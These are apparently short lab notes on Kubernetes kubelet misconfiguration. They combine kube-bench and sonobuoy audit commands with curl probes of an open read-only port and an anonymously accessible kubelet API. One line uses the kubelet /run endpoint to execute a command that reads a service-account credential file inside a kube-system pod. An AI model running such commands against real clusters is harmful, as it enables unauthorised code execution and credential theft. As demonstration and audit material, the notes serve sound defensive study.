##What is compromised on the kubelet

readOnlyPort: 10255
  mode: AlwaysAllow

#Kube-bench
docker run --pid=host -v /etc:/etc:ro -v /var:/var:ro -t aquasec/kube-bench:latest --version 1.11 --noremediations master
docker run --pid=host -v /etc:/etc:ro -v /var:/var:ro -t aquasec/kube-bench:latest --version 1.11 --noremediations node

vi /var/lib/kubelet/config.yaml

#readonlyPort
curl -k http://192.168.43.100:10255/pods|jq .|less
curl -k http://192.168.43.101:10255/metrics


#kubelet

curl -sk https://192.168.43.101:10250/runningpods/

kubectl apply -f docker-pod-no-master.yaml

curl -sk https://192.168.43.101:10250/run/kube-system/tiller-deploy-745ff9f9b-ggqr6/tiller -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt"



#sonobuoy

sonobuoy run
sonobuoy status
sonobuoy log
